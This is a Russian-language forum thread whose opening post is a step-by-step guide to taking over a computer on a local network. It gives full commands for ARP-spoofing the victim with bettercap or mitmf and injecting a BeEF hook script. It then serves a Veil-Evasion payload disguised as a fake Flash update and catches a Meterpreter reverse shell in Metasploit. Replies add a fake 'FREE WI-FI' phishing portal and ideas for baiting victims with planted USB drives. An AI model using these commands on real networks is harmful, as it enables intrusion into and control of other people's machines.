![]() |
Всем привет.
Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети. Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей. Для этого нам понадобиться: 1.Veil-Evasion. 2.Metasploit. 3.Beef. 4 Bettercap ( Mitmf тоже подойдет ). Я не буду подробно останавливаться на установке и использовании Veil-Evasion , кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка: https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/ Metasploit и Beef стоят в самом дистрибутиве кали. Bettercap устанавливаем командой apt-get install bettercap Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает: https://forum.antichat.xyz/attachmen...43580cc379.png лечиться это следующей заплаткой easy_install -U pip pip install Twisted==15.5.0 Отдельно хочу отметить инструмент для тестирования на проникновения Beef, это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров). Он позволяет выжать максимум из внедрения JS-кода. Я считаю что на данный момент это лучший инструмент для проведения XSS-атак. А сейчас давайте приступим к практической реализации. 1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду: cd /usr/share/beef-xss/ ./beef https://forum.antichat.xyz/attachmen...7a66736292.png Консоль не закрываем! Далее открываем браузер и в строке вводим следующий адрес http://localhost:3000/ui/authentication Login:beef Pasword:beef https://forum.antichat.xyz/attachmen...73bb3fc8c5.png после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка. https://forum.antichat.xyz/attachments/4766852/1111.png 2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом: sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "http://192.168.0.102:3000/hook.js" https://forum.antichat.xyz/attachmen...b850da9372.png где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование. адрес 192.168.0.102 -это адрес машины с которой мы атакуем. Консоль не закрываем! Если кто не знает, как узнать свой ip, то делается это командой ifconfig. https://forum.antichat.xyz/attachmen...ad1ac864e3.png Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом: python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-url http://192.168.0.102:3000/hook.js wlan0-это интерфейс 192.168.0.15 это адрес роутера, узнать его можно командойroute -n https://forum.antichat.xyz/attachmen...6777ac133d.png Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion. Еще раз повторюсь, по данной ссылке: https://codeby.net/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/ вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл. После того как сгенерировали файл , нам нужно запустить сервер. я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой python -m SimpleHTTPServer 8081 консоль не закрываем! Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.) Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки). Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc Для тех кто не ищет легких путей: запускаем метасплойт командой:msfconsole далее вводим: use multi/handler set payload windows/meterpreter/reverse_https set LHOST 192.168.0.102 (свой внутренний IP ) set LPORT 4444(вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!) exploit Консоль не закрываем! ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ. Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс. Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил. Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands. https://forum.antichat.xyz/attachmen...76f2d27b1b.png Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные. В моем случае это выглядит таким образом : http://192.168.0.102:3000/adobe/flash_update.png http://192.168.0.102:8081/flash_update12.exe https://forum.antichat.xyz/attachmen...cea3cada52.png Далее в нижнем правом углу нажимаем на кнопку Execute. Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия. На этом пока всё, спасибо за внимание. |
Очешуенно же)
Давно сижу на форуме, всем спасибо, крайне приятно вас читать! |
лайк! мне было впадлу писать об этой связке )))) ты молодец. С меня репост.
|
Отличная статья, спасибо!
|
Познавательно, буду пробовать)Благодарствую. Доучиться бы до момента когда сам смогу все это придумывать,находить.
|
Что за mitmf? у меня bettercap не пашет, ошибка такая "undefined method 'arp_opcode" for nil:NilClass" Если поможете буду благодарен!
|
Обновите линукс: apt-get update && apt-get dist-upgrade.если не поможет, тогда рекомендую перeустановить линукс.Данная ошибка появляется из за библиотек и связана она с интерфейсом wlan.
mitmf -это инструмент для проведения атак "Человек по середине" аналог bettercap. |
Цитата:
|
Цитата:
|
Цитата:
|
Спасибо за интересную статью.
|
можете скриншот показать с вашей проблемой?так будет проще. я просто не могу понять на каком этапе у вас это выскакивает
|
Цитата:
|
переустановка оси.
|
Нехватило места на 8 гиговой флехе для установки обновлений персистенс раздел создал на ней все б нормально, только очень странно что 4 гига кончаются после скачивания мб 500... то есть скачал программу с этого "курса" установил и места почти не осталось...как можно проверить сколько места на зашифрованном разделе?в gparted показывает что то около 4 гигов насколько я помню, а так чет кажется меньше. Могут ли обновы в 3 -4 гига уложится?или место больше нужно?
|
Спасибо за статью) Дополню пожалуй коротким своим видосом про интеграцию BeeF и Metasploit
Возможно пригодится |
Все опробованно, доступно и понятно, еще раз спасибо.
Подскажите, где можно покурить про способы доставке полезной нагрузки на целевой хост. И оффтоп, может кто-нибудь подскажет, бескрайние просторы пестрят объявлениями о взломе почтовых ящиков типа gmail (визуально не лохотрон, т.к. ресурсы с такими объявлениями достойны уважения и врятли позволят себе постить разводки), как это вообще возможно, ведь это не подбор и не взлом хоста с которого клиент посещает ресурс, неужели рассылка писем с просьбой ввести пароль Кстати обратил внимание на то, что одним из важных условий является не обращение к нескольким ребятам для одновременного взлома. |
Фишинг имееет место быть., как один из вариантов ,Что касается о способах доставки полезной нагрузки , то на этом форуме информации предостаточно.
|
Цитата:
|
про доставку на целевй хост - можно воспользоваться старыми методами в нектоорых случаях аля забыть диск в нужном месте с надписю маркером Мои фото Маша.М или выслать подарочную флешку на 256 мб забрендированную под фирменную.
|
Цитата:
|
А зачем вообще mitmf или bettercap прикручивать?! Взять JS'ник и сверстать прямо на форму. service apache2 start. И всё, Далее о Veil Evaison - к сожалению проект сей исчерпал себя и палится всем, чем только можно даже браузером хрома. Ну и в довесок, не проще ли юзать Java applets? А в целом статья очень даже хороша.
Ах да всё это прекрасно работает не в локалке, если белый ip. |
Цитата:
|
Цитата:
|
СОбирался писать подобное но в качестве проги для лже обновления юзать пэинт
|
Цитата:
|
Цитата:
Добавлено 05 марта Beef-xss + wifiphisher - очень отличная вариация. #wifiphisher --nojamming --essid "FREE WI-FI" -p oauth-login <--- тут специально сформированный файл, вернее отредактированный index.html , в который вставлен скрипт биф После запуска и коннекта ( если этой iphone то вообще хорошо, так как нажав на название сети и выбрав подключиться, на смарте АВТОМАТИЧЕСКИ вспылвает окно ( фейковое ) и стартует скрипт) на Андроиде надо после покдлючения браузер запускать. Так вот, почему то срабатывает 1 раз из 20, так как после запуска wifiphisher beef отваливается, причем сканом видно 3000 порт открыт, но нет связи. Гасим фишер, убиваем процесс, далее service beef-xss restart и вновь все ок, старутем фишер и тут как карта ляжет. Кто то может прокоментировать ситуацию? так раз 20-30 сделаешь и опять вроде ловит. |
Цитата:
|
Не совсем понял,для чего тут используется BeeF. Предположим мы подняли сервер,сгенерили нагрузку (js),запустили перенаправление траффика в bettercap и ловим сессию в MSF. Что в этой связке делает BeeF ?
|
а вы попробуйте сделать как вы говорили, и сделать как я описал, и все сами поймете. тем более я в статье описал для чего нужен Beef и что он делает.
|
Читайте внимательно статью..
|
Цитата:
python -m SimpleHTTPServer 8081 |
если он запустит полезную нагрузку..то закрыта страница или открыта, значение не имеет..
|
ну это стандартная защита, даже на нормальные файлы так ругается.
|
Это не просто социальная инженерия)) Это навыки цифрового иллюзиониста, мать его!
|
На форумх вообще не сижу, считаю их бесполезной тратой времени...
Но кодибай меня радует! Всем добра! |
| Время: 13:30 |